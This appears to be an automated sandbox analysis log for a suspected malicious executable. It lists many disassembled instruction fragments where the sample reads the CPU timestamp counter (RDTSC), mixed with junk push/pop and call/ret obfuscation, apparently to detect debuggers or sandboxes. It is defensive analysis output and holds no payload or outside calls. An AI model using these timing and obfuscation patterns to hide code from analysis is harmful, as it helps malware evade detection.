Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C29533 second address: C295B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2D4D13D55h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a js 00007FF2D4D13D58h 0x00000010 push esi 0x00000011 jmp 00007FF2D4D13D50h 0x00000016 pop esi 0x00000017 nop 0x00000018 push 00000000h 0x0000001a push ecx 0x0000001b call 00007FF2D4D13D48h 0x00000020 pop ecx 0x00000021 mov dword ptr [esp+04h], ecx 0x00000025 add dword ptr [esp+04h], 00000017h 0x0000002d inc ecx 0x0000002e push ecx 0x0000002f ret 0x00000030 pop ecx 0x00000031 ret 0x00000032 mov esi, dword ptr [ebp+122D1C71h] 0x00000038 mov esi, dword ptr [ebp+122D33CAh] 0x0000003e push 00000000h 0x00000040 push eax 0x00000041 jmp 00007FF2D4D13D50h 0x00000046 pop edi 0x00000047 push 00000000h 0x00000049 add edi, dword ptr [ebp+122D2917h] 0x0000004f push eax 0x00000050 js 00007FF2D4D13D54h 0x00000056 push eax 0x00000057 push edx 0x00000058 push edx 0x00000059 pop edx 0x0000005a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C295B8 second address: C295BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2C0B7 second address: C2C0BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2C597 second address: C2C59B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2D4EF second address: C2D50E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FF2D4D13D58h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2D50E second address: C2D599 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a adc ebx, 79E4F68Ah 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push edi 0x00000015 call 00007FF2D4EC6CA8h 0x0000001a pop edi 0x0000001b mov dword ptr [esp+04h], edi 0x0000001f add dword ptr [esp+04h], 00000015h 0x00000027 inc edi 0x00000028 push edi 0x00000029 ret 0x0000002a pop edi 0x0000002b ret 0x0000002c movsx ebx, dx 0x0000002f jmp 00007FF2D4EC6CACh 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push ecx 0x00000039 call 00007FF2D4EC6CA8h 0x0000003e pop ecx 0x0000003f mov dword ptr [esp+04h], ecx 0x00000043 add dword ptr [esp+04h], 00000014h 0x0000004b inc ecx 0x0000004c push ecx 0x0000004d ret 0x0000004e pop ecx 0x0000004f ret 0x00000050 mov ebx, edi 0x00000052 jmp 00007FF2D4EC6CAFh 0x00000057 xchg eax, esi 0x00000058 push edx 0x00000059 jmp 00007FF2D4EC6CB5h 0x0000005e pop edx 0x0000005f push eax 0x00000060 push edx 0x00000061 push eax 0x00000062 push edx 0x00000063 push eax 0x00000064 push edx 0x00000065 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2D599 second address: C2D59D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2D59D second address: C2D5A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C27410 second address: C27416 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2F3F7 second address: C2F46D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push edi 0x0000000c call 00007FF2D4EC6CA8h 0x00000011 pop edi 0x00000012 mov dword ptr [esp+04h], edi 0x00000016 add dword ptr [esp+04h], 0000001Dh 0x0000001e inc edi 0x0000001f push edi 0x00000020 ret 0x00000021 pop edi 0x00000022 ret 0x00000023 jmp 00007FF2D4EC6CB4h 0x00000028 push 00000000h 0x0000002a mov edi, dword ptr [ebp+122D2A3Dh] 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push eax 0x00000035 call 00007FF2D4EC6CA8h 0x0000003a pop eax 0x0000003b mov dword ptr [esp+04h], eax 0x0000003f add dword ptr [esp+04h], 0000001Bh 0x00000047 inc eax 0x00000048 push eax 0x00000049 ret 0x0000004a pop eax 0x0000004b ret 0x0000004c push eax 0x0000004d push eax 0x0000004e push edx 0x0000004f push edx 0x00000050 push edi 0x00000051 pop edi 0x00000052 pop edx 0x00000053 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2F46D second address: C2F47D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF2D4D13D4Bh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C311A6 second address: C3121A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2D4EC6CAAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b xor dword ptr [ebp+1245AF79h], esi 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push edx 0x00000016 call 00007FF2D4EC6CA8h 0x0000001b pop edx 0x0000001c mov dword ptr [esp+04h], edx 0x00000020 add dword ptr [esp+04h], 0000001Dh 0x00000028 inc edx 0x00000029 push edx 0x0000002a ret 0x0000002b pop edx 0x0000002c ret 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push ebx 0x00000032 call 00007FF2D4EC6CA8h 0x00000037 pop ebx 0x00000038 mov dword ptr [esp+04h], ebx 0x0000003c add dword ptr [esp+04h], 0000001Ah 0x00000044 inc ebx 0x00000045 push ebx 0x00000046 ret 0x00000047 pop ebx 0x00000048 ret 0x00000049 push eax 0x0000004a jnp 00007FF2D4EC6CB8h 0x00000050 push eax 0x00000051 push edx 0x00000052 jmp 00007FF2D4EC6CAAh 0x00000057 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C32124 second address: C321B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2D4D13D57h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c push esi 0x0000000d pop esi 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 popad 0x00000011 pushad 0x00000012 jp 00007FF2D4D13D46h 0x00000018 js 00007FF2D4D13D46h 0x0000001e popad 0x0000001f popad 0x00000020 nop 0x00000021 push ecx 0x00000022 sub di, 95B2h 0x00000027 pop ebx 0x00000028 stc 0x00000029 push 00000000h 0x0000002b mov dword ptr [ebp+122D1C71h], eax 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push edi 0x00000036 call 00007FF2D4D13D48h 0x0000003b pop edi 0x0000003c mov dword ptr [esp+04h], edi 0x00000040 add dword ptr [esp+04h], 0000001Bh 0x00000048 inc edi 0x00000049 push edi 0x0000004a ret 0x0000004b pop edi 0x0000004c ret 0x0000004d mov edi, 1A827722h 0x00000052 mov edi, dword ptr [ebp+122D20E5h] 0x00000058 xchg eax, esi 0x00000059 jmp 00007FF2D4D13D55h 0x0000005e push eax 0x0000005f push eax 0x00000060 push edx 0x00000061 je 00007FF2D4D13D48h 0x00000067 pushad 0x00000068 popad 0x00000069 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C3319E second address: C3324C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2D4EC6CB7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push edx 0x00000010 call 00007FF2D4EC6CA8h 0x00000015 pop edx 0x00000016 mov dword ptr [esp+04h], edx 0x0000001a add dword ptr [esp+04h], 00000019h 0x00000022 inc edx 0x00000023 push edx 0x00000024 ret 0x00000025 pop edx 0x00000026 ret 0x00000027 call 00007FF2D4EC6CB4h 0x0000002c sub dword ptr [ebp+1244FFB3h], ebx 0x00000032 pop edi 0x00000033 push 00000000h 0x00000035 mov ebx, dword ptr [ebp+122D2B19h] 0x0000003b push 00000000h 0x0000003d push 00000000h 0x0000003f push ebx 0x00000040 call 00007FF2D4EC6CA8h 0x00000045 pop ebx 0x00000046 mov dword ptr [esp+04h], ebx 0x0000004a add dword ptr [esp+04h], 0000001Ch 0x00000052 inc ebx 0x00000053 push ebx 0x00000054 ret 0x00000055 pop ebx 0x00000056 ret 0x00000057 push ecx 0x00000058 mov edi, 3F2E8312h 0x0000005d pop ebx 0x0000005e xchg eax, esi 0x0000005f jmp 00007FF2D4EC6CAEh 0x00000064 push eax 0x00000065 push eax 0x00000066 push edx 0x00000067 jns 00007FF2D4EC6CACh 0x0000006d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C352EB second address: C3531E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2D4D13D57h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FF2D4D13D56h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C362BF second address: C36335 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2D4EC6CAEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c jmp 00007FF2D4EC6CB3h 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push esi 0x00000016 call 00007FF2D4EC6CA8h 0x0000001b pop esi 0x0000001c mov dword ptr [esp+04h], esi 0x00000020 add dword ptr [esp+04h], 00000015h 0x00000028 inc esi 0x00000029 push esi 0x0000002a ret 0x0000002b pop esi 0x0000002c ret 0x0000002d js 00007FF2D4EC6CA6h 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push ebx 0x00000038 call 00007FF2D4EC6CA8h 0x0000003d pop ebx 0x0000003e mov dword ptr [esp+04h], ebx 0x00000042 add dword ptr [esp+04h], 0000001Ah 0x0000004a inc ebx 0x0000004b push ebx 0x0000004c ret 0x0000004d pop ebx 0x0000004e ret 0x0000004f xchg eax, esi 0x00000050 pushad 0x00000051 push eax 0x00000052 push eax 0x00000053 push edx 0x00000054 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C36335 second address: C3633E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C3633E second address: C36342 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C36342 second address: C36346 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2D797 second address: C2D7BE instructions: 0x00000000 rdtsc 0x00000002 ja 00007FF2D4EC6CACh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FF2D4EC6CB4h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2E608 second address: C2E60D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2D7BE second address: C2D7C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C383B8 second address: C383BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C323D6 second address: C323DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2E60D second address: C2E613 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C383BF second address: C383C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FF2D4EC6CA6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C323DC second address: C323E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C323E1 second address: C323E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C392F5 second address: C39305 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jo 00007FF2D4D13D54h 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C3A286 second address: C3A299 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF2D4EC6CA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C3A299 second address: C3A29E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C3A29E second address: C3A2A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FF2D4EC6CA6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C34420 second address: C34426 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C34426 second address: C3443C instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FF2D4EC6CA8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jns 00007FF2D4EC6CA6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C3443C second address: C34449 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FF2D4D13D46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C3E531 second address: C3E537 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C3E537 second address: C3E53D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C3E53D second address: C3E54F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF2D4EC6CAEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C393FB second address: C393FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD484A second address: BD4850 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C393FF second address: C39403 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE6F84 second address: BE6FBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 jmp 00007FF2D4EC6CB0h 0x0000000a jno 00007FF2D4EC6CA6h 0x00000010 pop esi 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jg 00007FF2D4EC6CAAh 0x0000001a jbe 00007FF2D4EC6CAEh 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE6FBB second address: BE6FCB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF2D4D13D4Ah 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C38545 second address: C3854A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE6FCB second address: BE6FCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE6FCF second address: BE6FE3 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FF2D4EC6CA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jl 00007FF2D4EC6CAEh 0x00000010 push esi 0x00000011 pop esi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C3854A second address: C38599 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push dword ptr fs:[00000000h] 0x00000011 mov bl, D8h 0x00000013 mov dword ptr fs:[00000000h], esp 0x0000001a mov dword ptr [ebp+122D34DDh], esi 0x00000020 mov eax, dword ptr [ebp+122D07E5h] 0x00000026 push FFFFFFFFh 0x00000028 add dword ptr [ebp+122D362Ah], ebx 0x0000002e nop 0x0000002f js 00007FF2D4D13D5Bh 0x00000035 jmp 00007FF2D4D13D55h 0x0000003a push eax 0x0000003b push ecx 0x0000003c pushad 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C42125 second address: C4212B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4212B second address: C42135 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FF2D4D13D46h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C45D1E second address: C45D22 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C45D22 second address: C45D28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C45D28 second address: C45D2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C45D2E second address: C45D5A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a ja 00007FF2D4D13D4Eh 0x00000010 jc 00007FF2D4D13D46h 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 pop edx 0x00000019 pop eax 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FF2D4D13D4Fh 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C45D5A second address: C45D6D instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FF2D4EC6CA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b je 00007FF2D4EC6CA6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C46076 second address: C4607A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4607A second address: C4607E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4607E second address: C46084 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C3A463 second address: C3A4D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2D4EC6CAAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jmp 00007FF2D4EC6CADh 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push ebx 0x00000014 call 00007FF2D4EC6CA8h 0x00000019 pop ebx 0x0000001a mov dword ptr [esp+04h], ebx 0x0000001e add dword ptr [esp+04h], 00000018h 0x00000026 inc ebx 0x00000027 push ebx 0x00000028 ret 0x00000029 pop ebx 0x0000002a ret 0x0000002b push dword ptr fs:[00000000h] 0x00000032 mov ebx, dword ptr [ebp+122D2A75h] 0x00000038 mov dword ptr fs:[00000000h], esp 0x0000003f mov ebx, dword ptr [ebp+122D2A61h] 0x00000045 mov eax, dword ptr [ebp+122D0DF9h] 0x0000004b sub dword ptr [ebp+122D1EB3h], ebx 0x00000051 push FFFFFFFFh 0x00000053 xor edi, dword ptr [ebp+122D396Dh] 0x00000059 nop 0x0000005a push eax 0x0000005b push edx 0x0000005c push eax 0x0000005d push edx 0x0000005e push eax 0x0000005f push edx 0x00000060 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C3A4D6 second address: C3A4DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C3A4DA second address: C3A4DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C3A4DE second address: C3A4E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C3A4E4 second address: C3A4EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C3A4EA second address: C3A4EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4B5FD second address: C4B602 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C515FD second address: C51605 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C51605 second address: C51633 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FF2D4EC6CA6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FF2D4EC6CB8h 0x00000015 push ecx 0x00000016 pushad 0x00000017 popad 0x00000018 pushad 0x00000019 popad 0x0000001a pop ecx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C51633 second address: C51638 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C503BB second address: C503C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jno 00007FF2D4EC6CA6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C503C7 second address: C503CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C50D60 second address: C50D71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop ebx 0x00000008 jl 00007FF2D4EC6CB4h 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C50D71 second address: C50D77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C510AF second address: C510B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C510B3 second address: C510B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C5147D second address: C51497 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2D4EC6CB6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C55BDC second address: C55BE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FF2D4D13D46h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C54AD1 second address: C54AD5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C54AD5 second address: C54ADB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C21D76 second address: C21D9D instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF2D4EC6CBEh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C21D9D second address: C21DBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FF2D4D13D59h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C21DBF second address: C21DC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
